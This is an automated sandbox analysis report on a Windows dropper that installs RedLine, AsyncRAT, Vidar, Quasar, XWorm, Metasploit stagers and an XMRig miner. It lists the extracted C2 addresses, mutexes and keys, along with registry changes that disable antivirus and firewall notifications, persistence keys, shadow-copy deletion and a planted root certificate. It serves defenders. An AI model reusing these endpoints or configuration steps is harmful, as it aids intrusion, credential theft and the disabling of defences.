asyncrat | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

17-12-2024 13:35

241217-qv6rzs1nhp 10

15-11-2024 19:06

14-11-2024 23:35

14-11-2024 23:26

14-11-2024 23:12

Analysis

max time kernel
279s
max time network
552s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
14-11-2024 23:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

redline

Botnet

Logs

185.215.113.9:9137

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

18.ip.gl.ply.gg:6606

18.ip.gl.ply.gg:7707

18.ip.gl.ply.gg:8808

18.ip.gl.ply.gg:9028

Mutex

7U2HW8ZYjc9H

Attributes

delay
3
install
true
install_file
Discord.exe
install_folder
%AppData%

aes.plain

Extracted

Family

vidar

Version

11.5

Botnet

321a707fa673780c2e4ab40d133f2899

https://t.me/gos90t

https://steamcommunity.com/profiles/76561199800374635

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

192.168.43.241:4782

91.92.254.40:4782

Mutex

0517af80-95f0-4a6d-a904-5b7ee8faa157

Attributes

encryption_key
6095BF6D5D58D02597F98370DFD1CCEB782F1EDD
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
svhost
subdirectory
SubDir

Extracted

Family

xworm

pressure-creates.gl.at.ply.gg:56274

assistance-arbitration.gl.at.ply.gg:12152

rondtimes.top:1940

Attributes

Install_directory
%AppData%
install_file
svchost.exe

Extracted

Family

redline

185.215.113.9:12617

Extracted

Family

redline

Botnet

30072024

185.215.113.67:40960

Extracted

Family

redline

Botnet

newbundle2

185.215.113.67:15206

Extracted

Family

redline

Botnet

BUY TG @FATHEROFCARDERS

45.66.231.214:9932

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

metasploit_stager

144.34.162.13:3333

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

89.105.223.196:29862

Extracted

Family

quasar

Version

1.4.0

Botnet

svhost

151.177.61.79:4782

Mutex

a148a6d8-1253-4e62-bc5f-c0242dd62e69

Attributes

encryption_key
5BEC1A8BC6F8F695D1337C51454E0B7F3A4FE968
install_name
svhost.exe
log_directory
Logs
reconnect_delay
3000
startup_key
svhost
subdirectory
svhost

Extracted

Family

vidar

Version

10.6

Botnet

af458cf23e4b27326a35871876cc63d9

https://steamcommunity.com/profiles/76561199747278259

https://t.me/armad2a

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Neshta payload 1 IoCs

resource	yara_rule
behavioral1/files/0x000400000001dbc4-11649.dat	family_neshta

Detect Vidar Stealer 6 IoCs

stealer

resource	yara_rule
behavioral1/files/0x000c0000000197fd-234.dat	family_vidar_v7
behavioral1/memory/2456-243-0x00000000011E0000-0x0000000001439000-memory.dmp	family_vidar_v7
behavioral1/memory/2172-240-0x0000000006670000-0x00000000068C9000-memory.dmp	family_vidar_v7
behavioral1/memory/2172-598-0x0000000006670000-0x000000000696B000-memory.dmp	family_vidar_v7
behavioral1/memory/2456-1224-0x00000000011E0000-0x0000000001439000-memory.dmp	family_vidar_v7
behavioral1/memory/6024-15452-0x0000000000FB0000-0x00000000011F8000-memory.dmp	family_vidar_v7

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral1/memory/2336-9628-0x0000000000F40000-0x0000000000F5A000-memory.dmp	family_xworm
behavioral1/files/0x000400000001d9a2-11398.dat	family_xworm
behavioral1/memory/2512-12019-0x0000000000960000-0x0000000000976000-memory.dmp	family_xworm
behavioral1/memory/7008-15397-0x00000000008F0000-0x0000000000904000-memory.dmp	family_xworm

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4"	sysppvrdnvs.exe

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta
Neshta family
neshta
Phorphiex family
phorphiex

Phorphiex payload 4 IoCs

resource	yara_rule
behavioral1/files/0x0006000000005b6d-1229.dat	family_phorphiex
behavioral1/files/0x000700000001cfc2-10811.dat	family_phorphiex
behavioral1/files/0x000400000001fd8f-15648.dat	family_phorphiex
behavioral1/files/0x000500000001dedd-17217.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 6 IoCs

resource	yara_rule
behavioral1/memory/2708-3576-0x00000000000A0000-0x00000000003C4000-memory.dmp	family_quasar
behavioral1/files/0x000400000001cc71-5348.dat	family_quasar
behavioral1/memory/5360-5350-0x00000000003D0000-0x00000000006F4000-memory.dmp	family_quasar
behavioral1/memory/3604-11448-0x0000000000150000-0x0000000000474000-memory.dmp	family_quasar
behavioral1/memory/4408-15424-0x0000000000CC0000-0x0000000000D44000-memory.dmp	family_quasar
behavioral1/memory/4516-15489-0x0000000000940000-0x00000000009C4000-memory.dmp	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 7 IoCs

resource	yara_rule
behavioral1/files/0x0008000000018334-59.dat	family_redline
behavioral1/memory/2812-64-0x0000000000D80000-0x0000000000DD2000-memory.dmp	family_redline
behavioral1/memory/4432-10748-0x0000000001190000-0x00000000011E2000-memory.dmp	family_redline
behavioral1/memory/1588-10779-0x0000000000320000-0x0000000000372000-memory.dmp	family_redline
behavioral1/memory/2852-11676-0x00000000001C0000-0x0000000000212000-memory.dmp	family_redline
behavioral1/memory/5832-11788-0x0000000000160000-0x00000000001B2000-memory.dmp	family_redline
behavioral1/memory/2864-13535-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline

Redline family
redline

Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs

description	pid	Process	procid_target
PID 2504 created 1192	2504	2561810786.exe	20
PID 2504 created 1192	2504	2561810786.exe	20
PID 2432 created 1192	2432	winupsecvmgr.exe	20
PID 2432 created 1192	2432	winupsecvmgr.exe	20
PID 2432 created 1192	2432	winupsecvmgr.exe	20
PID 5864 created 1192	5864	nxmr.exe	20
PID 5864 created 1192	5864	nxmr.exe	20
PID 2488 created 1192	2488	winupsecvmgr.exe	20

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Windows security bypass 2 TTPs 6 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe

Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000500000001960c-173.dat	family_asyncrat

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
4360	bcdedit.exe
6080	bcdedit.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/2432-1284-0x000000013FF80000-0x0000000140517000-memory.dmp	xmrig
behavioral1/memory/956-1288-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4388	powershell.exe
3572	powershell.exe
5072	powershell.exe
1812	powershell.exe
2312	powershell.exe
4288	powershell.exe
4064	powershell.exe
2944	powershell.exe
4924	powershell.exe
3148	powershell.exe
2132	powershell.exe
4856	powershell.exe
6052	powershell.exe
5204	powershell.exe
4308	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
6432	netsh.exe
3024	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 4 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
1504	chrome.exe
2672	chrome.exe
1332	chrome.exe
2016	chrome.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe

Executes dropped EXE 33 IoCs

pid	Process
2812	buildred.exe
904	postbox.exe
1584	uhigdbf.exe
1760	Discord3.exe
2260	clamer.exe
2660	fseawd.exe
2952	Discord.exe
3028	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
2456	TPB-1.exe
2764	kmvcsaed.exe
1736	WatchDog.exe
316	Token%20Gen.exe
1696	Token%20Gen.exe
1704	random.exe
1656	mlphnb.exe
700	pi.exe
1616	sysppvrdnvs.exe
2996	227131299.exe
572	1201025448.exe
2616	427717387.exe
2504	2561810786.exe
2432	winupsecvmgr.exe
2744	Vhpcde.exe
2708	discord.exe
5360	Client.exe
5812	config.exe
5864	nxmr.exe
5904	client.exe
2488	winupsecvmgr.exe
3140	MajesticExec.exe
2336	svchost.exe
3512	RMS1.exe
3468	kill.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine	random.exe

Loads dropped DLL 64 IoCs

pid	Process
2172	4363463463464363463463463.exe
2172	4363463463464363463463463.exe
2172	4363463463464363463463463.exe
2172	4363463463464363463463463.exe
1676	cmd.exe
1616	cmd.exe
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
2172	4363463463464363463463463.exe
2172	4363463463464363463463463.exe
1532	WerFault.exe
1532	WerFault.exe
1532	WerFault.exe
1532	WerFault.exe
1532	WerFault.exe
1532	WerFault.exe
1532	WerFault.exe
2172	4363463463464363463463463.exe
2172	4363463463464363463463463.exe
2172	4363463463464363463463463.exe
2172	4363463463464363463463463.exe
2172	4363463463464363463463463.exe
1192	Explorer.EXE
2172	4363463463464363463463463.exe
1192	Explorer.EXE
316	Token%20Gen.exe
1696	Token%20Gen.exe
2172	4363463463464363463463463.exe
2172	4363463463464363463463463.exe
1192	Explorer.EXE
2456	TPB-1.exe
2456	TPB-1.exe
2248	WerFault.exe
2248	WerFault.exe
2248	WerFault.exe
2248	WerFault.exe
2248	WerFault.exe
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
2172	4363463463464363463463463.exe
2172	4363463463464363463463463.exe
1616	sysppvrdnvs.exe
1616	sysppvrdnvs.exe
1616	sysppvrdnvs.exe
2616	427717387.exe
2056	taskeng.exe
2172	4363463463464363463463463.exe
1192	Explorer.EXE
1192	Explorer.EXE
2172	4363463463464363463463463.exe
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	152.89.198.214

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysppvrdnvs.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe"	pi.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
377	raw.githubusercontent.com
871	raw.githubusercontent.com
168	raw.githubusercontent.com
253	raw.githubusercontent.com
317	raw.githubusercontent.com
686	raw.githubusercontent.com
15	raw.githubusercontent.com
16	raw.githubusercontent.com
169	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
348	ip-api.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
6888	tasklist.exe
4880	tasklist.exe
824	tasklist.exe
2920	tasklist.exe
4992	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1704	random.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2432 set thread context of 600	2432	winupsecvmgr.exe	111
PID 2432 set thread context of 956	2432	winupsecvmgr.exe	112
PID 2744 set thread context of 5452	2744	Vhpcde.exe	120

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000400000001c917-585.dat	upx
behavioral1/memory/1696-587-0x000007FEF5680000-0x000007FEF5AEE000-memory.dmp	upx
behavioral1/memory/3880-15319-0x0000000001D60000-0x0000000001FA8000-memory.dmp	upx
behavioral1/memory/6024-15321-0x0000000000FB0000-0x00000000011F8000-memory.dmp	upx
behavioral1/memory/6024-15452-0x0000000000FB0000-0x00000000011F8000-memory.dmp	upx

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\Test Task17.job	fseawd.exe
File created	C:\Windows\sysppvrdnvs.exe	pi.exe
File opened for modification	C:\Windows\sysppvrdnvs.exe	pi.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2924	sc.exe
1332	sc.exe
1056	sc.exe
4600	sc.exe
5632	sc.exe
5940	sc.exe
2464	sc.exe
2152	sc.exe
3860	sc.exe
2100	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000d00000001a3f6-441.dat	pyinstaller

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral1/files/0x0005000000019fdd-333.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
1532	3028	WerFault.exe	52
2248	1736	WerFault.exe	57
3596	5132	WerFault.exe	294
4388	3996	WerFault.exe	345
4180	6376	WerFault.exe	534
4872	5112	WerFault.exe	567

System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	config.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Discord3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	427717387.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kmvcsaed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WatchDog.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mlphnb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysppvrdnvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pi.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	buildred.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Discord.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fseawd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TPB-1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TPB-1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	TPB-1.exe

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
872	timeout.exe
2408	timeout.exe
5256	timeout.exe
7964	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
4124	vssadmin.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
1084	taskkill.exe
3364	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
9060	reg.exe

Modifies system certificate store 2 TTPs 21 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 190000000100000010000000dbd91ea86008fd8536f2b37529666c7b0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079000000140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d13010